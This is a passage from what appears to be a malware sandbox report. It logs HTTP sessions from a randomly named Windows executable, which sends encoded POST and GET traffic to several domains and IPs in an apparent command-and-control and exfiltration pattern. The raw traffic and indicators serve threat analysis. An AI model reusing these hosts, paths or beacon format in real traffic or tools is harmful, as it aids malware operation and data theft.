                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:55:50.646014929 CET | 781               | IN        | HTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 09 Jan 2025 15:55:50 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 167
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 09 Jan 2025 16:55:50 GMT
                                                                                    Location: https://ogbos88vip.click
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iPWwRjxDLE%2FXGi0MQJtrqvjOc1h2KWtNzBh80EQNY831F9Q4k4l2S8eDF3vTQgiZfJvv6AkfDYJXy1tj6xvNNlf3WCOk82FYEAF2uMnhMO%2BSB2ScCxpd7D%2BYtBxkBVqwII4n"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59d291a7a022a-ORD
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session ID | Source IP     | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                    29         | 192.168.11.30 | 49853       | 136.243.64.147 | 80               | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                          | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:56:04.669420958 CET | 826               | OUT       | POST /cxj4/ HTTP/1.1
                                                                                    Host: www.100millionjobs.africa
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.100millionjobs.africa
                                                                                    Referer: http://www.100millionjobs.africa/cxj4/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Ascii: 6B-l7F=tIFi+WNsJjQFmHIPGadKlZCadffY3ejZA+gwHvvOmIEuT5NAFYT1fe92Loy/QXepozQsrO3BzwpsybE1zv/vqgU+DzV8I7Ev5EPLLMvGTQF1laaC4DvP5EbMLkyQmCXMkcR3/18Us/+HT9dfEUPqC2oSrJs+G1lAToQHhIU4Yx28vMCJuI1XQvJrTZepg6ymkA==
                                                                                    Jan 9, 2025 16:56:04.898854971 CET | 493               | IN        | HTTP/1.1 302 Found
                                                                                    Date: Thu, 09 Jan 2025 15:56:04 GMT
                                                                                    Server: Apache
                                                                                    Location: http://maximumgroup.co.za/cxj4/
                                                                                    Content-Length: 290
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                    Session ID | Source IP     | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                    30         | 192.168.11.30 | 49854       | 136.243.64.147 | 80               | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                          | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:56:07.436496019 CET | 846               | OUT       | POST /cxj4/ HTTP/1.1
                                                                                    Host: www.100millionjobs.africa
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.100millionjobs.africa
                                                                                    Referer: http://www.100millionjobs.africa/cxj4/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Ascii: 6B-l7F=tIFi+WNsJjQFkn4PF9BKk5CdBvfY5+jdA+8wHuqLl+UuWrVAGd/1ee92EIy6UXeyozcSrPLBzxNsye41zYToqwU8CDV6HbEv5EPLLIOhTQt1lumCpRXQ6EbDcUyQxSWLkcRF/3E6s92HT+JfEFPpVGoIkptHAlkOcJZww40lfSPIn7vTzLBVDP1GPYzBi4z95HyzfiD+6QZoXnhkDqGNsAo=
                                                                                    Jan 9, 2025 16:56:07.660809994 CET | 493               | IN        | HTTP/1.1 302 Found
                                                                                    Date: Thu, 09 Jan 2025 15:56:07 GMT
                                                                                    Server: Apache
                                                                                    Location: http://maximumgroup.co.za/cxj4/
                                                                                    Content-Length: 290
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                    Session ID | Source IP     | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                    31         | 192.168.11.30 | 49855       | 136.243.64.147 | 80               | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp                          | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:56:10.206928015 CET | 2578              | OUT       | POST /cxj4/ HTTP/1.1
                                                                                    Host: www.100millionjobs.africa
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.100millionjobs.africa
                                                                                    Referer: http://www.100millionjobs.africa/cxj4/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Ascii: 6B-l7F=tIFi+WNsJjQFkn4PF9BKk5CdBvfY5+jdA+8wHuqLl+cuW+JAG6L1de92Noy7UXe/ozFVrPGjzylsz4s16MHohwU8HzV7I7E25F/PLMihTQt1lv2C5zvQ8EbMLkycmCWvkcIy/xYEs/WHTvFfFzTpVGoIqJsgAloLcJArw5MTehjIlP/FgZwKdtF/HI73k7jvzAzTeRb30idTXjlRX6eU5VF9yMOaZMZDBxxyouxkgXWuxLpOpUNWHA3hDd5M+mkfZCkVjm/qv/e70yUX1PjwY5Qb6oeeMRctdgjkgRPNsLBXTin0i6bBda4GHUK38VdkjWMVlhWzc4j/RfPUjQWuLjGcYUvjE7OK2eAA4+F0H9oWYDMg6l68D0PbWTHyo9AGkbBGdnFtERyRs5qwF8W7oB7FuhROJVLINc8Ohlro7Zn413CJLeyWiOmyS1eguaUTfibgirNCBcDDAsadFSQ6lUr0d8e5m+05qFQhUqV+IrrZJqW6360iyCjQjF/Zd5MuAcuPuptetB3VNKGX8d2LCD/3MEES0ttsaxCl9vwiJVXWhy3J01qIhmAvChByjlWCKXG0uMXltKfI/InDQgJf9e/K7+rcqAZp34tBm9HFRNfv5EEbL2SRnac0yA6MaXk183srji9jEyApmJ3/UesraOuYBn6w/2995CpGAUHQjs1WypkoKhLtWhvSmPn0pW6u9wnhJrCuqZ4eTrQqwmhQRx6i1Ec/fjz6tg5FZwd1PRW/h07bjuJCLhIUGtIYAkgY9Iro0gKLe9RgMoZSOtr/WgR6OOlg+/oax7+g8P1sG7dAHzUsg9o8nDdc0MyMJK537jeJdXJkSFKEFxbRtWWtoSNiBp1OFzpisqhOVLd7sHytpw4ILVPe0FP2QUKsp+2/NjKOL5itlntugnTSuNLHwgCs3nEHDZY+sEtdNkWs+QZutW84cqEHlscJz1CJnm/ncm0Js0KfL4ryQPfmKkKlinF97QeklovrEpUGThalzzWGh [TRUNCATED]
                                                                                    Jan 9, 2025 16:56:10.206948042 CET | 1385              | OUT       |
                                                                                    Data Ascii: afUEAXBEbuF/fDp7JCCaRYF0/pSwvAdinwx4CLp5rDxKYuh3gCrMICL3EdCwPhFNnJdF3a8pHfIyD+zKvFXmCdPVRRDXpMcgSGokWiKHpm3f+SSTzqzTSfPAeRrxYswJxnfUUbwqWUHj9u+OWEtRpvWeLuGPOyEhCv/3Fq8yAbHV4l0nu40AFgJba4ajR2/PPOn6wJngjRIQnqEgEi3pxiONKSCy0cDp9k5o8sgi9jDqpvqRaMa
                                                                                    Jan 9, 2025 16:56:10.433511019 CET | 493               | IN        | HTTP/1.1 302 Found
                                                                                    Date: Thu, 09 Jan 2025 15:56:10 GMT
                                                                                    Server: Apache
                                                                                    Location: http://maximumgroup.co.za/cxj4/
                                                                                    Content-Length: 290
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    32 | 192.168.11.30 | 49856 | 136.243.64.147 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:56:12.971327066 CET | 544 | OUT | GET /cxj4/?80k=lRapCPMXgDk&6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqIJ6FVQVj1Nnq3yix8Cc= HTTP/1.1
                                                                                    Host: www.100millionjobs.africa
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:56:13.199781895 CET | 785 | IN | HTTP/1.1 302 Found
                                                                                    Date: Thu, 09 Jan 2025 15:56:13 GMT
                                                                                    Server: Apache
                                                                                    Location: http://maximumgroup.co.za/cxj4/?80k=lRapCPMXgDk&6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqIJ6FVQVj1Nnq3yix8Cc=
                                                                                    Content-Length: 438
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 3f 38 30 6b 3d 6c 52 61 70 43 50 4d 58 67 44 6b 26 61 6d 70 3b 36 42 2d 6c 37 46 3d 67 4b 74 43 39 6d 70 4e 48 54 6b 54 72 30 30 4a 43 62 6c 72 6c 38 61 33 41 66 54 58 2f 64 75 6f 4d 38 45 62 58 4d 4b 4e 6a 65 59 6d 45 5a 74 63 47 61 6a 79 42 63 74 72 57 4f 36 6f 45 48 4f 6f 6f 67 46 54 6c 66 53 38 2b 44 4e 51 77 35 35 44 32 4d 66 43 71 41 68 6a 49 6a 4e 67 5a 36 6b 77 6b 48 4c 71 49 4a 36 46 56 51 56 6a 31 4e 6e 71 33 79 69 78 38 43 63 3d 22 3e 68 65 72 65 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/?80k=lRapCPMXgDk&amp;6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqIJ6FVQVj1Nnq3yix8Cc=">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    33 | 192.168.11.30 | 49857 | 202.95.11.110 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:56:19.121620893 CET | 805 | OUT | POST /wbfy/ HTTP/1.1
                                                                                    Host: www.mirenzhibo.net
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mirenzhibo.net
                                                                                    Referer: http://www.mirenzhibo.net/wbfy/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 79 65 34 55 33 64 79 49 63 37 79 66 2f 77 66 34 2b 4f 76 31 6a 70 79 45 70 46 4d 6b 54 38 42 6b 66 55 72 52 4c 32 53 58 51 6f 74 78 56 30 4d 49 2b 4e 79 66 4e 53 68 73 32 49 4a 35 55 62 62 4a 54 2f 2b 63 64 70 77 76 6c 31 42 4e 65 7a 58 58 55 5a 6e 38 49 38 59 49 4e 42 53 78 46 67 66 50 39 38 48 4e 4a 79 75 30 30 6e 34 58 78 45 30 63 6e 55 4e 7a 31 6d 35 65 46 4f 63 65 76 6f 68 2b 71 38 59 42 48 31 6e 54 39 74 61 58 35 6f 56 49 70 75 37 59 51 44 4c 34 6c 34 38 4f 55 46 4f 43 5a 56 36 6e 33 6d 36 47 65 44 39 69 37 72 69 6c 50 56 49 7a 46 67 3d 3d
                                                                                    Data Ascii: 6B-l7F=ac270/Kc6bxJye4U3dyIc7yf/wf4+Ov1jpyEpFMkT8BkfUrRL2SXQotxV0MI+NyfNShs2IJ5UbbJT/+cdpwvl1BNezXXUZn8I8YINBSxFgfP98HNJyu00n4XxE0cnUNz1m5eFOcevoh+q8YBH1nT9taX5oVIpu7YQDL4l48OUFOCZV6n3m6GeD9i7rilPVIzFg==
                                                                                    Jan 9, 2025 16:56:19.465543985 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Thu, 09 Jan 2025 15:56:19 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d404 Not Found0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    34 | 192.168.11.30 | 49858 | 202.95.11.110 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:56:21.966253996 CET | 825 | OUT | POST /wbfy/ HTTP/1.1
                                                                                    Host: www.mirenzhibo.net
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mirenzhibo.net
                                                                                    Referer: http://www.mirenzhibo.net/wbfy/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 7a 2f 6f 55 77 4e 4f 49 61 62 79 65 77 51 66 34 6c 65 76 78 6a 70 2b 45 70 45 49 30 54 4b 70 6b 66 32 7a 52 4b 7a 79 58 54 6f 74 78 4e 45 4d 4e 39 39 79 45 4e 53 6c 6b 32 4a 31 35 55 62 50 4a 54 36 43 63 63 61 59 6f 6b 6c 42 54 66 44 58 56 61 35 6e 38 49 38 59 49 4e 42 58 71 46 67 48 50 39 4d 58 4e 49 51 47 31 72 58 34 59 32 45 30 63 78 6b 4d 36 31 6d 35 73 46 4d 70 4c 76 72 56 2b 71 38 49 42 47 67 62 53 7a 74 61 52 32 49 55 70 68 4e 69 4e 49 78 2f 4e 73 4b 6b 6c 62 6e 44 32 52 69 58 39 71 6c 4f 45 4e 6a 42 50 6e 71 50 4e 4e 58 4a 6f 59 6e 32 43 55 4d 70 74 45 32 47 4e 78 6f 68 4f 2f 39 51 49 4a 4d 41 3d
                                                                                    Data Ascii: 6B-l7F=ac270/Kc6bxJz/oUwNOIabyewQf4levxjp+EpEI0TKpkf2zRKzyXTotxNEMN99yENSlk2J15UbPJT6CccaYoklBTfDXVa5n8I8YINBXqFgHP9MXNIQG1rX4Y2E0cxkM61m5sFMpLvrV+q8IBGgbSztaR2IUphNiNIx/NsKklbnD2RiX9qlOENjBPnqPNNXJoYn2CUMptE2GNxohO/9QIJMA=
                                                                                    Jan 9, 2025 16:56:22.308672905 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Thu, 09 Jan 2025 15:56:22 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d404 Not Found0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    35 | 192.168.11.30 | 49859 | 202.95.11.110 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:56:24.805553913 CET | 1289 | OUT | POST /wbfy/ HTTP/1.1
                                                                                    Host: www.mirenzhibo.net
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mirenzhibo.net
                                                                                    Referer: http://www.mirenzhibo.net/wbfy/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 61 63 32 37 30 2f 4b 63 36 62 78 4a 7a 2f 6f 55 77 4e 4f 49 61 62 79 65 77 51 66 34 6c 65 76 78 6a 70 2b 45 70 45 49 30 54 4b 52 6b 65 46 37 52 4b 53 79 58 53 6f 74 78 54 30 4d 4d 39 39 7a 65 4e 57 42 67 32 4a 34 4d 55 59 33 4a 63 38 32 63 56 4c 59 6f 39 56 42 54 61 7a 58 59 55 5a 6e 6c 49 38 49 4d 4e 42 6e 71 46 67 48 50 39 4b 72 4e 49 43 75 31 74 58 34 58 78 45 30 71 6e 55 4e 66 31 6c 4a 57 46 4d 73 77 76 75 4a 2b 71 50 67 42 48 53 7a 53 7a 74 61 52 30 34 55 6f 68 4e 65 4d 49 78 6d 45 73 4c 73 54 61 57 58 32 54 58 69 5a 39 55 79 34 65 6a 46 2b 76 2b 79 30 45 55 4e 38 57 46 69 42 64 38 46 79 43 55 71 69 32 4e 4e 4b 72 64 51 73 51 63 6b 48 6a 48 6b 6e 49 73 76 51 59 67 71 35 30 56 4a 54 78 67 39 4c 47 6e 7a 66 4f 79 4c 7a 39 67 39 35 71 30 6e 67 44 6e 70 63 37 6f 6b 7a 77 67 5a 53 35 50 55 66 64 48 2b 75 45 6e 63 76 44 68 69 2b 6f 78 52 44 41 32 77 34 34 63 30 2f 34 61 6c 79 57 6d 66 63 71 77 33 49 62 38 6a 38 44 54 39 77 2f 4e 30 7a 31 6d 78 50 75 49 64 73 64 37 36 79 54 51 66 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=[TRUNCATED]
                                                                                    Jan 9, 2025 16:56:24.805605888 CET | 2653 | OUT | Data Raw: 44 2b 32 39 62 43 39 49 44 41 70 41 41 54 6a 4b 62 71 7a 4d 65 32 71 41 4c 59 6c 62 50 66 4e 36 32 51 79 52 76 53 4b 46 58 7a 32 71 37 55 33 71 46 56 79 6d 31 46 34 75 66 61 76 38 71 36 46 48 78 41 45 38 51 6d 78 68 62 39 4d 2b 63 69 38 44 46 6d
                                                                                    Data Ascii: D+29bC9IDApAATjKbqzMe2qALYlbPfN62QyRvSKFXz2q7U3qFVym1F4ufav8q6FHxAE8Qmxhb9M+ci8DFmsf3RGl/VmUHxE1DQ9W6p+zCGDR4s8ynEb+WfbirM8yIpoE9Dhrw7B3Lk3+HEFbtSI/k3oBbIHvmM1hhevMOfzATHL+hvHImk64I5SHOMSS8FXRPPqBMN2B1lccvhwsUnh4ltwvcZQFBjF5qAfNGSggEwhybjp6e3/
                                                                                    Jan 9, 2025 16:56:25.147938013 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Thu, 09 Jan 2025 15:56:25 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d404 Not Found0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    36 | 192.168.11.30 | 49860 | 202.95.11.110 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:56:27.628243923 CET | 537 | OUT | GET /wbfy/?6B-l7F=Xeeb3ImT6ZQQytgApKylbK7mnw/Uy82KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPSWgMjv1orXfOBS8k1A=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.mirenzhibo.net
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:56:28.133764982 CET | 995 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 09 Jan 2025 15:56:27 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Data Raw: 33 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 42 61 69 64 75 73 70 69 64 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 [TRUNCATED]
                                                                                    Data Ascii: 322<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="Baiduspider" content="noindex, nofollow"><title></title> <script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><body style="padding: 0;margin: 0;"><div><script rel="nofollow" src="http://www.zbywl.com/js.js"></script></div></body></html>0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    37 | 192.168.11.30 | 49861 | 13.248.169.48 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:56:33.551520109 CET | 814 | OUT | POST /kgjj/ HTTP/1.1
                                                                                    Host: www.nextlevel.finance
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.nextlevel.finance
                                                                                    Referer: http://www.nextlevel.finance/kgjj/
